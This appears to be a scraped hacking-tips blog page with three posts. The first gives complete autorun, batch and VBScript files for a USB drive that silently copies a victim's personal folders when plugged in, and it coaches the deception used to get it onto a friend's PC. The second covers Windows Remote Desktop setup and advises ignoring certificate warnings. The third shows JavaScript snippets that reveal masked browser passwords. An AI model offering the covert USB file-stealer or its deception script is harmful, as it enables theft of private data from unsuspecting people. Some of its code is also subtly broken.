Steel Someone Secret File Using USB Flash Drive

Let’s say you and your friend are preparing for an all important exam that is going to decide the course the rest of your life takes. Your friend has some important notes on his computer that he isn’t going to share with you. Your friend is a moron. You need the notes so badly that you are willing to steal from him. He deserves it anyway.

To get the notes you can either break into his house at night, an accomplice keeps you hanging by a rope from the roof while you deliberately copy the files to your flash drive taking care not to let your feet touch the floor. Or you can walk into his room one morning and say with a feigned smile, “Hey, buddy! I have some great new music. Want it?”. Then plug your USB Flash drive into his PC to automatically copy his notes to your pen drive, secretly and silently. Copy the songs you brought to his PC to complete the act.
Sneaky, isn’t it? So let us prepare such a sinister USB Flash drive.
STEP 1
Open Notepad (I recommend Notepad++) and copy-paste the following lines.

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat

Save this as autorun.inf
The icon line is optional. You can change the icon to your tastes or leave it to the default icon. It’s useful for social engineering purposes like enticing the user to click a file on the drive by making it looks like a game or something.
The “action=” command is optional too but sometimes when the autorun launches it may ask the user what to open. Depending on what you put here the user will be instructed to click Ok or run the file. This code acts as a backup just in case the user is asked what to open. This is not required if you are operating the computer.
The “shell/open command” also acts as a backup in case the user clicks cancel instead of open when prompted. This code will execute when the drive letter is clicked on.
STEP 2
Open Notepad again and copy-paste the following lines

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% “%USERPROFILE%\pictures” “%drive%\all\My pics”
%backupcmd% “%USERPROFILE%\Favorites” “%drive%\all\Favorites”
%backupcmd% “%USERPROFILE%\videos” “%drive%\all\vids”
@echo off
cls

Save this as file.bat
This file is configured to copy the contents of the current users pictures, favorites, and videos folder to the Flash drive under a folder called “all”. This is the section of the code you will need to edit depending on what you want to copy.
The first file path “%USERPROFILE%\pictures” – is the target.
The second file path “%drive%\all\My pics” – is the destination.
STEP 3
Open Notepad once again and copy-paste the following line.

CreateObject(“Wscript.Shell”).Run “””” & WScript.Arguments(0) & “”””, 0, False

Save this as invisible.vbs
This code runs the file.bat as a process so it does not show the CMD prompt and everything the batch file is processing.
STEP 4
Open Notepad one last time and copy-paste the following line.

wscript.exe \invisible.vbs file.bat

Save this as launch.bat
This batch file does two things, it looks for the invisible.vbs file in the root of the Flash drive then loads it with file.bat so file.bat is run with code from vbs file.
STEP 5
Copy all 4 files created in the above steps and put it on the root of the Flash drive, including the icon file if needed. Also create a folder named “all” where the contents are to be copied automatically. You can call this folder by any name, but then you need to reflect the changes you made in step 2.
This is all that needs to be done. Test the Flash drive on your own computer first before playing it out on your slave. It works flawlessly.

Read More

How to Use Remote Desktop in Windows 7

Steps

1. 1
   The first step to connecting the computers is to make sure that Windows Remote Desktop Connection is allowed through the firewall.
2. 
   2
   Open the Windows Start Menu, navigate to Computer and Right Click it to open the drop down menu. Click on Properties.
3. 
   3
   Navigate to Remote Settings
4. 
   4
   Select Allow connections from computers running any version of Remote Desktop(less secure) Click Ok or Apply. Do this on the computer you wish to connect to. Remember that only computers with Windows 7 Professional, Windows 7 Ultimate, Windows Vista Business, or Windows Vista Ultimate can be connected TO though you can connect FROM any version of Windows 7.
5. 
   5
   On the target computer that you wish to connect to we must discover its IPv4 Address(internet address). Open the start menu and type in the search box command prompt. Click command prompt to open.
6. 
   6
   Type ipconfig and press enter. In the list you will see "IPv4 Address. . . ." This will be the address of your target computer.
7. 
   7
   On your "client" computer open the start menu and type Remote Desktop and open Remote Desktop Connection.
8. 
   8
   In the open box type the IPv4 Address that you acquired from the target computer.
9. 
   9
   Windows will prompt you to enter your username and password that provides access to the target computer.
10. 10
    Your computer will likely show that there is a certificate problem but just connect anyway since its not a problem.
11. 11
    Congratulations! Your computer is now controlling another through Windows Remote Desktop Connection.

Read More

How to Reveal Hidden Passwords (Asterisks) in Web Browsers

Remember the situation, signing into your account with just a single click because browser is saving all your passwords for you. We know this is convenient but since you’re not typing your passwords any-more, eventually you’ll forget your password in a few days.  For security reasons, the password field in all browsers is masked with “asterisks” which won’t allow any third person (even you) to read the origi-nal typed password. But, what if you want to reveal the string behind the asterisks? There is actually few workaround for revealing the original passwords behind the asterisk and over the entire course of this article we’ll be discussing some known ways to reveal the characters behind the asterisks in different browsers.

Google Chrome:

Starting off with Google chrome, the easiest way to reveal the original passwords behind the asterisk is using inbuilt Inspect element feature in the browser.

• You just need to right click on the password field in the browser where you will get an option "Inspect Element". 
• After clicking on it, "Web Inspector" will open out and there you can see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks.

There’s another way using JavaScript which is quite quick and easy as compared to above method. Just open a site that allows users to login and after typing the password, just enter the following JavaScript code in the address bar.

Javascript: alert(document.getElementById('Passwd').value);

After entering the above code in the address bar, press enter and it will pop up a window with your password written on it.

Mozilla Firefox:

The Next most common browser is "Mozilla Firefox".

• The chrome's "Web Inspector" trick is also applicable in Firefox.
•  Open a site that asks for login (like Facebook), right click on the password field in the browser where you will get an option "Inspect Element". After clicking on it, "Web Inspector" will open out and there you can see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks as shown in screenshot below.

Apart from this, there’s another way which is quite quick and easy as compared to above method. For that you’ve to create a bookmark with the following JavaScript code as URL in it.

javascript:(function(){var s,F,j,f,i;s="";F=document.forms;for(j=0;j<F.length;++j){f=F[j];for(i=0;i<f.length;++i){if(f[i].type.toLowerCase()=="password")s+=f[i].value+"\n";}}if(s)alert("Password is:\n\n"+s);else alert("No passwords");})();

After saving this as a bookmark, open a site that allows users to login and after typing the password, open the saved bookmark by clicking on it and it will pop up a window with your password written on it.

Opera:

Next comes the "Opera" in that you can use "Dragonfly", which is an in built tool, to reveal the words behind the asterisks just like chrome's "Web Inspector". Open a site that asks for login (like
Facebook), right click on the password field in the browser and select "Inspect Element" option. After clicking on it, "Dragon Fly" will open out and you’ll see some code which is basically Html code and you just need to replace the "password" word with "text" word and it will reveal the words behind the asterisks as shown in screen shot below.

Internet Explorer:

In the same manner you can apply this trick on Internet explorer. First of all open any site (Gmail in our case) that allows user login. Now for bringing out “developer tools” press the f12 key. A new window will be opened and press Ctrl+B to enable selection of elements. After that go to login page and select the password field, doing this will take you to the password field’s code in developer window (highlighted by yellow). Now, you just need to replace the "password" word with "text" word and it will remove the asterisk mask in the password field, see screenshot below.

Apart from this, there’s another way which is quite quick and easy as compared to above method. Just open a site that allows users to login and after typing the password, just enter the following JavaScript code in the address bar.

alert(document.getElementById('Passwd').value);

After entering the above code in the address bar, press enter and it will pop up a window with your password written on it. (See pic below)

Wrap Up:

Although there are so many tools out there to help you in revealing the words behind the asterisks and to get the saved passwords with in a browser, you still need to keep your system safe and protected by using "Antivirus" plus "Firewall" to avoid stealing of these passwords by someone who have access to your system. If you can use these tools to reveal your saved passwords then others can also use the same ways to get information of yours.

Read More